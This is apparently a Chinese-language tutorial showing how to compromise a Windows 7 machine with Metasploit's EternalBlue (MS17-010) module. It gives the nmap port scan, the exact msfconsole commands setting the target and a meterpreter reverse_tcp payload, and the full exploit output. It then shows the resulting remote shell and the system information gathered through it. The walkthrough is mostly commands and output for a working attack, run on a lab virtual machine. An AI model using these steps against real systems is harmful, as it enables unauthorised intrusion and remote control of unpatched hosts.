首先给大家介绍一下两样东西:
然后开始讲解本次的主题。。。。
首先打开Kali(一个著名的渗透测试专用的Linux系统,渗透测试必须的工具)。
然后打开应用程序-漏洞利用工具集-metasploit。
成功后显示如下:
[i] Database already started[i] The database appears to be already configured, skipping initializationCall trans opt: received. 2-19-98 13:24:18 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` https://metasploit.com =[ metasploit v4.17.3-dev ]+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]+ -- --=[ 538 payloads - 41 encoders - 10 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf >
直接利用nmap对10.0.3.65主机进行端口扫描:
msf > nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
结果如下:
TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!YoussefdeMacBook-Pro:~ youssef$ sudo nmap -sV -Pn -p1-65535 -O -v 10.0.3.65Password:Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 10:56 CSTNSE: Loaded 43 scripts for scanning.Initiating ARP Ping Scan at 10:56Scanning 10.0.3.65 [1 port]Completed ARP Ping Scan at 10:56, 0.11s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 10:56Completed Parallel DNS resolution of 1 host. at 10:56, 0.01s elapsedInitiating SYN Stealth Scan at 10:56Scanning 10.0.3.65 [65535 ports]Discovered open port 139/tcp on 10.0.3.65Discovered open port 135/tcp on 10.0.3.65Discovered open port 3389/tcp on 10.0.3.65Discovered open port 445/tcp on 10.0.3.65Discovered open port 49153/tcp on 10.0.3.65Discovered open port 49157/tcp on 10.0.3.65Discovered open port 49152/tcp on 10.0.3.65Discovered open port 49155/tcp on 10.0.3.65Discovered open port 49154/tcp on 10.0.3.65Discovered open port 49156/tcp on 10.0.3.65Discovered open port 1688/tcp on 10.0.3.65Completed SYN Stealth Scan at 10:57, 37.66s elapsed (65535 total ports)Initiating Service scan at 10:57Scanning 11 services on 10.0.3.65Service scan Timing: About 36.36% done; ETC: 10:59 (0:01:35 remaining)Completed Service scan at 10:58, 81.47s elapsed (11 services on 1 host)Initiating OS detection (try #1) against 10.0.3.65NSE: Script scanning 10.0.3.65.Initiating NSE at 10:58Completed NSE at 10:58, 0.04s elapsedInitiating NSE at 10:58Completed NSE at 10:58, 0.04s elapsedNmap scan report for 10.0.3.65Host is up (0.0039s latency).Not shown: 65524 closed portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)1688/tcp open msrpc Microsoft Windows RPC3389/tcp open ms-wbt-server?49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49155/tcp open msrpc Microsoft Windows RPC49156/tcp open msrpc Microsoft Windows RPC49157/tcp open msrpc Microsoft Windows RPCMAC Address: 2C:6E:85:8D:C8:C7 (Intel Corporate)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Uptime guess: 0.311 days (since Tue Aug 7 03:30:19 2018)Network Distance: 1 hopTCP Sequence Prediction: Difficulty=260 (Good luck!)IP ID Sequence Generation: IncrementalService Info: Host: WIN-EEGC1ODGIOU; OS: Windows; CPE: cpe:/o:microsoft:windowsRead data files from: /usr/local/bin/../share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 123.04 seconds Raw packets sent: 66869 (2.943MB) | Rcvd: 65555 (2.623MB)
发现该主机是Windows7系统,并且开放了445端口,那么就有极大概率可以利用ms17_010_eternalblue漏洞了。如果发现主机不是win7或者没有开放该端口,那么本次实验就到此为止。。(꒪ꇴ꒪(꒪ꇴ꒪ ;)哈?
接下来,首先利用改漏洞,输入:
msf > use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue漏洞msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65rhost => 10.0.3.65 //设置攻击目标msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用meterpreter,这个是好东西,可以提供很多有意思的功能,不设置也可以,不设置的话就是直接获取到windows的cmdpayload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) > run //开始攻击
显示结果如下:
[*] Started reverse TCP handler on 10.0.3.215:4444 [*] 10.0.3.65:445 - Connecting to target for exploitation.[+] 10.0.3.65:445 - Connection established for exploitation.[+] 10.0.3.65:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.0.3.65:445 - CORE raw buffer dump (42 bytes)[*] 10.0.3.65:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes[*] 10.0.3.65:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv[*] 10.0.3.65:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.0.3.65:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.0.3.65:445 - Trying exploit with 17 Groom Allocations.[*] 10.0.3.65:445 - Sending all but last fragment of exploit packet[*] 10.0.3.65:445 - Starting non-paged pool grooming[+] 10.0.3.65:445 - Sending SMBv2 buffers[+] 10.0.3.65:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.0.3.65:445 - Sending final SMBv2 buffers.[*] 10.0.3.65:445 - Sending last fragment of exploit packet![*] 10.0.3.65:445 - Receiving response from exploit packet[+] 10.0.3.65:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.0.3.65:445 - Sending egg to corrupted connection.[*] 10.0.3.65:445 - Triggering free of corrupted buffer.[*] Sending stage (206403 bytes) to 10.0.3.65[*] Meterpreter session 3 opened (10.0.3.215:4444 -> 10.0.3.65:49162) at 2018-08-07 11:41:05 +0800[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter >
查看系统信息sysinfo:
meterpreter > sysinfoComputer : WIN-EEGC1ODGIOUOS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64System Language : zh_CNDomain : WORKGROUPLogged On Users : 0Meterpreter : x64/windows
获取命令行shell:
meterpreter > shellProcess 2772 created.Channel 1 created.Microsoft Windows [版本 6.1.7601]版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Windows\system32>C:\Windows\system32>systeminfosysteminfo主机名: WIN-EEGC1ODGIOUOS 名称: Microsoft Windows 7 专业版 OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立工作站OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00371-OEM-8992671-00524初始安装日期: 2017/8/25, 16:31:04系统启动时间: 2018/8/7, 11:59:41系统制造商: VMware, Inc.系统型号: VMware Virtual Platform系统类型: x64-based PC处理器: 安装了 1 个处理器。 [01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~1995 MhzBIOS 版本: Phoenix Technologies LTD 6.00, 2017/5/19Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 2,047 MB可用的物理内存: 1,542 MB虚拟内存: 最大值: 4,095 MB虚拟内存: 可用: 3,569 MB虚拟内存: 使用中: 526 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: 暂缺修补程序: 安装了 1 个修补程序。 [01]: KB976902网卡: 安装了 1 个 NIC。 [01]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 启用 DHCP: 是 DHCP 服务器: 10.0.3.1 IP 地址 [01]: 10.0.3.65 [02]: fe80::dec:dc90:295b:668cC:\Windows\system32>
退出:
C:\Windows\system32>exitexitmeterpreter > meterpreter > exit[*] Shutting down Meterpreter...[*] 10.0.3.65 - Meterpreter session 5 closed. Reason: User exitmsf exploit(windows/smb/ms17_010_eternalblue) >
具体的一些命令请参考这篇文章:
联系客服